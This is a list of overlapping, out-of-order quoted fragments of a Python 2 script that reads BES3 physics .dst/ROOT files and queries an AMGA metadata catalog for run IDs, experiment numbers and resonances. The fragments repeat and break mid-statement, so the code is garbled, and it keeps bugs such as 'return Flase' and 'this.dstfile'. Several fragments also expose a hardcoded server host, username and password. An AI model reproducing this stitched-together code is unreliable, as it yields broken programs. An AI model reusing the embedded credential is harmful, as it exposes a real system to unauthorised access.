"attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by",
"this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in",
"sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str",
"client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name",
"value of status is null #-1 <=> value of streamId is null #null",
"equal to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if",
"file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile",
"= new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t",
"#compare eventType with name of each entry if eventType == result[0]: return True",
"\"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries",
"#get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all",
"getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo = {}",
"%s:in the filename,runL = runH = %d,but runId in the root file is",
"calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file",
"i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get",
"file is in srcformat if file.endswith(format): flag = 1 return flag #Before reading",
"DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile =",
"equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"]",
"else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by",
"return Flase for item in entries: #for each entry,get its attributes in amga",
"#get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for",
"= pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 =",
"null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del",
"in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal",
"under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0]",
"=(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);')",
"of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print",
"catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if",
"print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time()",
"if res is not None: return res.group() #Get expNum and resonance from ExpSearch",
"__name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start -",
"with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance",
"null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import",
"= min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"]",
"and runto,and expNum isn't in expNumList #add this expNum to expNumList if result[3]",
"gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"]",
"of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum",
"#get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile",
"attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items =",
"#for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print",
"resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries",
"not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if",
"link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat)",
"runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] =",
"entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item #",
"for format in srcformat: #if format of file is in srcformat if file.endswith(format):",
"def getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo =",
"by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get",
"runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance",
"if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] =",
"file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule,",
"gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId",
"if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return",
"runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes",
"print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile)",
"type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else:",
"class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's",
"in filename is same as resonance that get from ExpSearch if expRes[\"resonance\"] ==",
"entries is None: print \"ExpSearch directory is empty, please run createBesDir first\" return",
"= attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in",
"= getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function",
"string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is",
"of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId",
"attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes =",
"attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are",
"%s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of",
"= client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get",
"attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error",
"attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\")",
"the filename,runL = runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"])",
"dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag =",
"= splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one runId",
"in resonance List,add it to resList if result[4] not in resList: resList.append(result[4]) #only",
"#for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId",
"mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry =",
"runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to",
"#set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId",
"= expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else:",
"ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in",
"/bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return",
"while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory",
"+ getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored in",
"resonance List,add it to resList if result[4] not in resList: resList.append(result[4]) #only including",
"return \"error\" #set values of attribute status #-1 <=> value of status is",
"value of streamId is null #null <=> value of Description is null attributes[\"status\"]",
"string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list =",
"entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please",
"end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start -",
"in srcformat: #if format of file is in srcformat if file.endswith(format): flag =",
"eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client",
"if eventType == result[0]: return True return False #judge format of file class",
"to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId",
"runids: #check all runid whether between runfrm and runto of each entry #under",
"null #-1 <=> value of status is null #-1 <=> value of streamId",
"%s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is",
"not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ','",
"in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client",
"return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time()",
"File's format is not \",self.format) #type of srcformat is list,it includes many formats",
"expRes = {} runIds = [] #change the .dst file to .root file",
"from ROOT import gROOT from amga import mdclient,mdinterface import string import re import",
"lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH",
"= {} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client",
"return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by",
"#-1 <=> value of streamId is null #null <=> value of Description is",
"runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH ==",
"raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get",
"including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several",
"of each entry if eventType == result[0]: return True return False #judge format",
"= lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored in",
"runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");')",
"calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of",
"result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"]",
"null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function",
"= dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {}",
"stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value",
"\"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid",
"runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] =",
"os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile)",
"calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"]",
"print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else:",
"[] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000:",
"filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to",
"pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds = list.group()",
"= eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType",
"string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2]",
"= {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch",
"Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId =",
"%s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute",
"=(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader*",
"result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = []",
"to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList",
"== False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if",
"format is not \",self.format) #type of srcformat is list,it includes many formats def",
"#file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object):",
"client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in",
"== False: print \"Can't get expNum and resonance of this file\" return \"error\"",
"ROOT import gROOT from amga import mdclient,mdinterface import string import re import time",
"of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance",
"= DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time() obj",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"]",
"one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several",
"False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else:",
"Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile",
"= attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"])",
"flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then",
"lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes",
"for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return",
"import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string import",
"1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong to",
"= attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if",
"changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else:",
"re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a string like:-10513,0,-10629",
".root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is",
"python # -*- coding:utf-8 -*- # author: linlei #for data/all name of file",
"gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader",
"calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum",
"= [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get",
"expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"]",
"them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is",
"and resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes =",
"gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] =",
"<=> value of streamId is null #null <=> value of Description is null",
"result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def",
"name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of",
"if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these",
"#resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self):",
"runid of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get",
"runfrm and runto,and expNum isn't in expNumList #add this expNum to expNumList if",
"None: return res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids):",
"are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare",
"#get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading",
"runid between runfrm and runto,and expNum isn't in expNumList #add this expNum to",
"file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this",
"= checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise",
"print \"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] =",
"client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry if eventType",
"<=> value of status is null #-1 <=> value of streamId is null",
"getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get",
"-*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim",
"is None: print \"ExpSearch directory is empty, please run createBesDir first\" return Flase",
"res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is",
"changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if",
"str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType",
"several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for",
"start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start =",
"filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the",
"def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by",
"RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename",
"getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if",
"rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for",
".dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag",
"entries = [] expRes = {} expNumList = [] resList = [] #print\"runids\",runids",
"= pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds =",
"filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if",
"attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is",
"from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat =",
"Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't",
"runids def getExpRes(runids): entries = [] expRes = {} expNumList = [] resList",
"in runids: #check all runid whether between runfrm and runto of each entry",
"amga import mdclient,mdinterface import string import re import time #get number behiend string",
"of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes",
"== lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in rootfile",
"like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule, #file",
"if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId",
"runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result",
"JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree*",
"mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry",
"#split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\"",
"to change their style to integer for i in items: if i!='0': runid=abs(string.atoi(i))",
"attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print",
"to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't",
"#has several resonances,may be has something wrong to this file print \"serveral resonance:\",resList",
"is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client =",
"in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"]",
"lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in rootfile if",
"values of attribute status #-1 <=> value of status is null attributes[\"status\"] =",
"%s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error",
"runIds = [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile)",
"runto = string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm",
"getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");')",
"file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree*",
"expRes = {} lfnInfo = {} runIds = [] #change the .dst file",
"#add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of",
"branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);')",
"the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content",
"client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry)",
"entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and",
"by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of dst",
"each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item",
"expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False:",
"lfnInfo = {} runIds = [] #change the .dst file to .root file",
"resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is",
"name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def",
"%d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in",
